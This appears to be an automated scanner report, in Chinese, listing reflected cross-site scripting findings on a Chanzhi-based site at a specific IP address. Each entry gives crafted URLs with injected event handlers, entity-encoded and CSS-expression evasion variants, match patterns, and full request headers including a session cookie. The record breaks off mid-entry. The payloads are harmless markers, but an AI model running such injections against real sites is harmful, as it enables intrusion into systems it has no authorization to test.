  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/index.php/article/c17.mhtml

URL http://202.201.39.48/index.php/article/c17/p2.mhtml
请求方式 GET
问题参数
判断标准 1、修改指定参数为构造的xss特殊字符;
2、如果浏览器能够执行注入代码,则认为存在该漏洞。
判断详情 1、构造URL: http://202.201.39.48/index.php/article/c17/p2.mhtml'%20onblur=%26%23x64;%26%23x66;%26%23x62;%26%23x68;%26%23x6d;%26%23x67;%26%23x28;%26%23x36;%26%23x35;%26%23x34;%26%23x39;%26%23x29;%20
2、设置参数 '%20onblur=%26%23x64;%26%23x66;%26%23x62;%26%23x68;%26%23x6d;%26%23x67;%26%23x28;%26%23x36;%26%23x35;%26%23x34;%26%23x39;%26%23x29;%20
3、在响应头及响应内容中匹配: onblur.*?dfbhmg(6549)
请求&响应 GET /index.php/article/c17/p2.mhtml'%20onblur=%26%23x64;%26%23x66;%26%23x62;%26%23x68;%26%23x6d;%26%23x67;%26%23x28;%26%23x36;%26%23x35;%26%23x34;%26%23x39;%26%23x29;%20 HTTP/1.1
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/index.php/article/c17.mhtml

URL http://202.201.39.48/index.php/article/c19/p2.mhtml
请求方式 GET
问题参数
判断标准 1、修改指定参数为构造的xss特殊字符;
2、如果浏览器能够执行注入代码,则认为存在该漏洞。
判断详情 1、构造URL: http://202.201.39.48/index.php/article/c19/p2.mhtml?'%20onmouseover=%22dfbhmg(6762)%22%3e%20var=%20
2、设置参数 '%20onmouseover=%22dfbhmg(6762)%22%3e%20var=%20
3、在响应头及响应内容中匹配: onmouseover.*?dfbhmg(6762)
请求&响应 GET /index.php/article/c19/p2.mhtml?'%20onmouseover=%22dfbhmg(6762)%22%3e%20var=%20 HTTP/1.1
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/index.php/article/c19.mhtml

URL http://202.201.39.48/index.php/article/c19/p2.mhtml
请求方式 GET
问题参数 var
判断标准 1、修改指定参数为构造的xss特殊字符;
2、如果浏览器能够执行注入代码,则认为存在该漏洞。
判断详情 1、构造URL: http://202.201.39.48/index.php/article/c19/p2.mhtml?var='%20onmouseover=%22dfbhmg(6865)%22%3e%20
2、设置参数 var'%20onmouseover=%22dfbhmg(6865)%22%3e%20
3、在响应头及响应内容中匹配: onmouseover.*?dfbhmg(6865)
请求&响应 GET /index.php/article/c19/p2.mhtml?var='%20onmouseover=%22dfbhmg(6865)%22%3e%20 HTTP/1.1
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/index.php/article/c19.mhtml

URL http://202.201.39.48/index.php/article/c19/p2.mhtml
请求方式 GET
问题参数
判断标准 1、修改指定参数为构造的xss特殊字符;
2、如果浏览器能够执行注入代码,则认为存在该漏洞。
判断详情 1、构造URL: http://202.201.39.48/index.php/article/c19/p2.mhtml/'%20onmouseover=dfbhmg(6526)%20
2、设置参数 '%20onmouseover=dfbhmg(6526)%20
3、在响应头及响应内容中匹配: onmouseover.*?dfbhmg(6526)
请求&响应 GET /index.php/article/c19/p2.mhtml/'%20onmouseover=dfbhmg(6526)%20 HTTP/1.1
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/index.php/article/c19.mhtml

URL http://202.201.39.48/index.php/article/c19/p2.mhtml
请求方式 GET
问题参数
判断标准 1、修改指定参数为构造的xss特殊字符;
2、如果浏览器能够执行注入代码,则认为存在该漏洞。
判断详情 1、构造URL: http://202.201.39.48/index.php/article/c19/p2.mhtml;'%20onblur=%26%23x64;%26%23x66;%26%23x62;%26%23x68;%26%23x6d;%26%23x67;%26%23x28;%26%23x36;%26%23x36;%26%23x33;%26%23x31;%26%23x29;%20
2、设置参数 '%20onblur=%26%23x64;%26%23x66;%26%23x62;%26%23x68;%26%23x6d;%26%23x67;%26%23x28;%26%23x36;%26%23x36;%26%23x33;%26%23x31;%26%23x29;%20
3、在响应头及响应内容中匹配: onblur.*?dfbhmg(6631)
请求&响应 GET /index.php/article/c19/p2.mhtml;'%20onblur=%26%23x64;%26%23x66;%26%23x62;%26%23x68;%26%23x6d;%26%23x67;%26%23x28;%26%23x36;%26%23x36;%26%23x33;%26%23x31;%26%23x29;%20 HTTP/1.1
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/index.php/article/c19.mhtml

URL http://202.201.39.48/index.php/article/c19/p2.mhtml
请求方式 GET
问题参数
判断标准 1、修改指定参数为构造的xss特殊字符;
2、如果浏览器能够执行注入代码,则认为存在该漏洞。
判断详情 1、构造URL: http://202.201.39.48/index.php/article/c19/p2.mhtml'%20onmouseover=dfbhmg(6894)%20var=%20
2、设置参数 '%20onmouseover=dfbhmg(6894)%20var=%20
3、在响应头及响应内容中匹配: onmouseover.*?dfbhmg(6894)
请求&响应 GET /index.php/article/c19/p2.mhtml'%20onmouseover=dfbhmg(6894)%20var=%20 HTTP/1.1
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/index.php/article/c19.mhtml

URL http://202.201.39.48/index.php/article/c36/p2.mhtml
请求方式 GET
问题参数
判断标准 1、修改指定参数为构造的xss特殊字符;
2、如果浏览器能够执行注入代码,则认为存在该漏洞。
判断详情 1、构造URL: http://202.201.39.48/index.php/article/c36/p2.mhtml?'%20style=dfbhmg:expre/**/ssion(dfbhmg(6060))%20var=%20
2、设置参数 '%20style=dfbhmg:expre/**/ssion(dfbhmg(6060))%20var=%20
3、在响应头及响应内容中匹配: style.*?dfbhmg:expre/**/ssion(dfbhmg(6060))
请求&响应 GET /index.php/article/c36/p2.mhtml?'%20style=dfbhmg:expre/**/ssion(dfbhmg(6060))%20var=%20 HTTP/1.1
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/index.php/article/c36.mhtml

URL http://202.201.39.48/index.php/article/c36/p2.mhtml
请求方式 GET
问题参数 var
判断标准 1、修改指定参数为构造的xss特殊字符;
2、如果浏览器能够执行注入代码,则认为存在该漏洞。
判断详情 1、构造URL: http://202.201.39.48/index.php/article/c36/p2.mhtml?var='%20onblur=%26%23x64;%26%23x66;%26%23x62;%26%23x68;%26%23x6d;%26%23x67;%26%23x28;%26%23x36;%26%23x39;%26%23x39;%26%23x36;%26%23x29;%20
2、设置参数 var'%20onblur=%26%23x64;%26%23x66;%26%23x62;%26%23x68;%26%23x6d;%26%23x67;%26%23x28;%26%23x36;%26%23x39;%26%23x39;%26%23x36;%26%23x29;%20
3、在响应头及响应内容中匹配: onblur.*?dfbhmg(6996)
请求&响应 GET /index.php/article/c36/p2.mhtml?var='%20onblur=%26%23x64;%26%23x66;%26%23x62;%26%23x68;%26%23x6d;%26%23x67;%26%23x28;%26%23x36;%26%23x39;%26%23x39;%26%23x36;%26%23x29;%20 HTTP/1.1
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/index.php/article/c36.mhtml

URL http://202.201.39.48/index.php/article/c36/p2.mhtml
请求方式 GET
问题参数
判断标准 1、修改指定参数为构造的xss特殊字符;
2、如果浏览器能够执行注入代码,则认为存在该漏洞。
判断详情 1、构造URL: http://202.201.39.48/index.php/article/c36/p2.mhtml/'%20onmouseover=dfbhmg(6960)%20var=%20
2、设置参数 '%20onmouseover=dfbhmg(6960)%20var=%20
3、在响应头及响应内容中匹配: onmouseover.*?dfbhmg(6960)
请求&响应 GET /index.php/article/c36/p2.mhtml/'%20onmouseover=dfbhmg(6960)%20var=%20 HTTP/1.1
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/index.php/article/c36.mhtml

URL http://202.201.39.48/index.php/article/c36/p2.mhtml
请求方式 GET
问题参数
判断标准 1、修改指定参数为构造的xss特殊字符;
2、如果浏览器能够执行注入代码,则认为存在该漏洞。
判断详情 1、构造URL: http://202.201.39.48/index.php/article/c36/p2.mhtml;'%20style=dfbhmg:expre/**/ssion(dfbhmg(6936))%20var=%20
2、设置参数 '%20style=dfbhmg:expre/**/ssion(dfbhmg(6936))%20var=%20
3、在响应头及响应内容中匹配: style.*?dfbhmg:expre/**/ssion(dfbhmg(6936))
请求&响应 GET /index.php/article/c36/p2.mhtml;'%20style=dfbhmg:expre/**/ssion(dfbhmg(6936))%20var=%20 HTTP/1.1
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/index.php/article/c36.mhtml

URL http://202.201.39.48/index.php/article/c36/p2.mhtml
请求方式 GET
问题参数
判断标准 1、修改指定参数为构造的xss特殊字符;
2、如果浏览器能够执行注入代码,则认为存在该漏洞。
判断详情 1、构造URL: http://202.201.39.48/index.php/article/c36/p2.mhtml'%20onmouseover=dfbhmg(6537)%20var=%20
2、设置参数 '%20onmouseover=dfbhmg(6537)%20var=%20
3、在响应头及响应内容中匹配: onmouseover.*?dfbhmg(6537)
请求&响应 GET /index.php/article/c36/p2.mhtml'%20onmouseover=dfbhmg(6537)%20var=%20 HTTP/1.1
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/index.php/article/c36.mhtml

URL http://202.201.39.48/index.php/message-comment-article-33.mhtml
请求方式 GET
问题参数 value0
判断标准 1、修改指定参数为构造的xss特殊字符;
2、如果浏览器能够执行注入代码,则认为存在该漏洞。
判断详情 1、构造URL: http://202.201.39.48/index.php/message-comment-article-'%20onmouseover=%22dfbhmg(6444)%22%3e%20var=%20.mhtml
2、设置参数 value0'%20onmouseover=%22dfbhmg(6444)%22%3e%20var=%20
3、在响应头及响应内容中匹配: onmouseover.*?dfbhmg(6444)
请求&响应 GET /index.php/message-comment-article-'%20onmouseover=%22dfbhmg(6444)%22%3e%20var=%20.mhtml HTTP/1.1
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/index.php/article/33.mhtml

URL http://202.201.39.48/index.php/message-comment-article-32.mhtml
请求方式 GET
问题参数 value0
判断标准 1、修改指定参数为构造的xss特殊字符;
2、如果浏览器能够执行注入代码,则认为存在该漏洞。
判断详情 1、构造URL: http://202.201.39.48/index.php/message-comment-article-'%20onmouseover=dfbhmg(6569)%20.mhtml
2、设置参数 value0'%20onmouseover=dfbhmg(6569)%20
3、在响应头及响应内容中匹配: onmouseover.*?dfbhmg(6569)
请求&响应 GET /index.php/message-comment-article-'%20onmouseover=dfbhmg(6569)%20.mhtml HTTP/1.1
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/index.php/article/32.mhtml

URL http://202.201.39.48/index.php/message-comment-article-23.mhtml
请求方式 GET
问题参数 value0
判断标准 1、修改指定参数为构造的xss特殊字符;
2、如果浏览器能够执行注入代码,则认为存在该漏洞。
判断详情 1、构造URL: http://202.201.39.48/index.php/message-comment-article-'%20onmouseover=dfbhmg(6334)%20.mhtml
2、设置参数 value0'%20onmouseover=dfbhmg(6334)%20
3、在响应头及响应内容中匹配: onmouseover.*?dfbhmg(6334)
请求&响应 GET /index.php/message-comment-article-'%20onmouseover=dfbhmg(6334)%20.mhtml HTTP/1.1
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/index.php/article/23.mhtml

URL http://202.201.39.48/index.php/message-comment-article-34.mhtml
请求方式 GET
问题参数 value0
判断标准 1、修改指定参数为构造的xss特殊字符;
2、如果浏览器能够执行注入代码,则认为存在该漏洞。
判断详情 1、构造URL: http://202.201.39.48/index.php/message-comment-article-'%20onmouseover=dfbhmg(6701)%20.mhtml
2、设置参数 value0'%20onmouseover=dfbhmg(6701)%20
3、在响应头及响应内容中匹配: onmouseover.*?dfbhmg(6701)
请求&响应 GET /index.php/message-comment-article-'%20onmouseover=dfbhmg(6701)%20.mhtml HTTP/1.1
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/index.php/article/34.mhtml

URL http://202.201.39.48/index.php/message-comment-article-28.mhtml
请求方式 GET
问题参数 value0
判断标准 1、修改指定参数为构造的xss特殊字符;
2、如果浏览器能够执行注入代码,则认为存在该漏洞。
判断详情 1、构造URL: http://202.201.39.48/index.php/message-comment-article-'%20onmouseover=dfbhmg(6336)%20.mhtml
2、设置参数 value0'%20onmouseover=dfbhmg(6336)%20
3、在响应头及响应内容中匹配: onmouseover.*?dfbhmg(6336)
请求&响应 GET /index.php/message-comment-article-'%20onmouseover=dfbhmg(6336)%20.mhtml HTTP/1.1
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/index.php/article/28.mhtml

URL http://202.201.39.48/index.php/message-comment-article-25.mhtml
请求方式 GET
问题参数 value0
判断标准 1、修改指定参数为构造的xss特殊字符;
2、如果浏览器能够执行注入代码,则认为存在该漏洞。
判断详情 1、构造URL: http://202.201.39.48/index.php/message-comment-article-'%20onmouseover=%22dfbhmg(6711)%22%3e%20var=%20.mhtml
2、设置参数 value0'%20onmouseover=%22dfbhmg(6711)%22%3e%20var=%20
3、在响应头及响应内容中匹配: onmouseover.*?dfbhmg(6711)
请求&响应 GET /index.php/message-comment-article-'%20onmouseover=%22dfbhmg(6711)%22%3e%20var=%20.mhtml HTTP/1.1
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/index.php/article/25.mhtml

URL http://202.201.39.48/index.php/message-comment-article-29.mhtml
请求方式 GET
问题参数 value0
判断标准 1、修改指定参数为构造的xss特殊字符;
2、如果浏览器能够执行注入代码,则认为存在该漏洞。
判断详情 1、构造URL: http://202.201.39.48/index.php/message-comment-article-'%20onmouseover=dfbhmg(6645)%20var=%20.mhtml
2、设置参数 value0'%20onmouseover=dfbhmg(6645)%20var=%20
3、在响应头及响应内容中匹配: onmouseover.*?dfbhmg(6645)
请求&响应 GET /index.php/message-comment-article-'%20onmouseover=dfbhmg(6645)%20var=%20.mhtml HTTP/1.1
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/index.php/article/29.mhtml

URL http://202.201.39.48/index.php/message-comment-article-30.mhtml
请求方式 GET
问题参数 value0
判断标准 1、修改指定参数为构造的xss特殊字符;
2、如果浏览器能够执行注入代码,则认为存在该漏洞。
判断详情 1、构造URL: http://202.201.39.48/index.php/message-comment-article-'%20onmouseover=%22dfbhmg(6940)%22%3e%20.mhtml
2、设置参数 value0'%20onmouseover=%22dfbhmg(6940)%22%3e%20
3、在响应头及响应内容中匹配: onmouseover.*?dfbhmg(6940)
请求&响应 GET /index.php/message-comment-article-'%20onmouseover=%22dfbhmg(6940)%22%3e%20.mhtml HTTP/1.1
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/index.php/article/30.mhtml

URL http://202.201.39.48/index.php/message-comment-article-35.mhtml
请求方式 GET
问题参数 value0
判断标准 1、修改指定参数为构造的xss特殊字符;
2、如果浏览器能够执行注入代码,则认为存在该漏洞。
判断详情 1、构造URL: http://202.201.39.48/index.php/message-comment-article-'%20onmouseover=dfbhmg(6623)%20.mhtml
2、设置参数 value0'%20onmouseover=dfbhmg(6623)%20
3、在响应头及响应内容中匹配: onmouseover.*?dfbhmg(6623)
请求&响应 GET /index.php/message-comment-article-'%20onmouseover=dfbhmg(6623)%20.mhtml HTTP/1.1
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/index.php/article/35.mhtml

URL http://202.201.39.48/index.php/message-comment-article-21.mhtml
请求方式 GET
问题参数 value0
判断标准 1、修改指定参数为构造的xss特殊字符;
2、如果浏览器能够执行注入代码,则认为存在该漏洞。
判断详情 1、构造URL: http://202.201.39.48/index.php/message-comment-article-'%20onblur=%26%23x64;%26%23x66;%26%23x62;%26%23x68;%26%23x6d;%26%23x67;%26%23x28;%26%23x36;%26%23x38;%26%23x35;%26%23x35;%26%23x29;%20.mhtml
2、设置参数 value0'%20onblur=%26%23x64;%26%23x66;%26%23x62;%26%23x68;%26%23x6d;%26%23x67;%26%23x28;%26%23x36;%26%23x38;%26%23x35;%26%23x35;%26%23x29;%20
3、在响应头及响应内容中匹配: onblur.*?dfbhmg(6855)
请求&响应 GET /index.php/message-comment-article-'%20onblur=%26%23x64;%26%23x66;%26%23x62;%26%23x68;%26%23x6d;%26%23x67;%26%23x28;%26%23x36;%26%23x38;%26%23x35;%26%23x35;%26%23x29;%20.mhtml HTTP/1.1
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/index.php/article/21.mhtml

URL http://202.201.39.48/index.php/message-comment-article-19.mhtml
请求方式 GET
问题参数 value0
判断标准 1、修改指定参数为构造的xss特殊字符;
2、如果浏览器能够执行注入代码,则认为存在该漏洞。
判断详情 1、构造URL: http://202.201.39.48/index.php/message-comment-article-'%20onmouseover=dfbhmg(6435)%20var=%20.mhtml
2、设置参数 value0'%20onmouseover=dfbhmg(6435)%20var=%20
3、在响应头及响应内容中匹配: onmouseover.*?dfbhmg(6435)
请求&响应 GET /index.php/message-comment-article-'%20onmouseover=dfbhmg(6435)%20var=%20.mhtml HTTP/1.1
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/index.php/article/19.mhtml

URL http://202.201.39.48/index.php/user-deny-product-view-aHR0cDovLzIwMi4yMDEuMzkuNDgvaW5kZXgucGhwL3NpdGVtYXAueG1s.mhtml
请求方式 GET
问题参数 value1
判断标准 1、修改指定参数为构造的xss特殊字符;
2、如果浏览器能够执行注入代码,则认为存在该漏洞。
判断详情 1、构造URL: http://202.201.39.48/index.php/user-deny-product-view-"%20onmouseover=dfbhmg(6630)%20.mhtml
2、设置参数 value1"%20onmouseover=dfbhmg(6630)%20
3、在响应头及响应内容中匹配: onmouseover.*?dfbhmg(6630)
请求&响应 GET /index.php/user-deny-product-view-"%20onmouseover=dfbhmg(6630)%20.mhtml HTTP/1.1
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/index.php/product/chanzhi-1.mhtml

URL http://202.201.39.48/index.php/user-deny-product-view-aHR0cDovLzIwMi4yMDEuMzkuNDgvaW5kZXgucGhwL3NpdGVtYXAueG1s.mhtml
请求方式 GET
问题参数 value0
判断标准 1、修改指定参数为构造的xss特殊字符;
2、如果浏览器能够执行注入代码,则认为存在该漏洞。
判断详情 1、构造URL: http://202.201.39.48/index.php/user-deny-product-"%20onmouseover=%22dfbhmg(6394)%22%3e%20-aHR0cDovLzIwMi4yMDEuMzkuNDgvaW5kZXgucGhwL3NpdGVtYXAueG1s.mhtml
2、设置参数 value0"%20onmouseover=%22dfbhmg(6394)%22%3e%20
3、在响应头及响应内容中匹配: onmouseover.*?dfbhmg(6394)
请求&响应 GET /index.php/user-deny-product-"%20onmouseover=%22dfbhmg(6394)%22%3e%20-aHR0cDovLzIwMi4yMDEuMzkuNDgvaW5kZXgucGhwL3NpdGVtYXAueG1s.mhtml HTTP/1.1
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/index.php/product/chanzhi-1.mhtml

URL http://202.201.39.48/index.php/user-deny-product-view-aHR0cDovLzIwMi4yMDEuMzkuNDgvaW5kZXgucGhwL3NpdGVtYXAueG1s.html
请求方式 GET
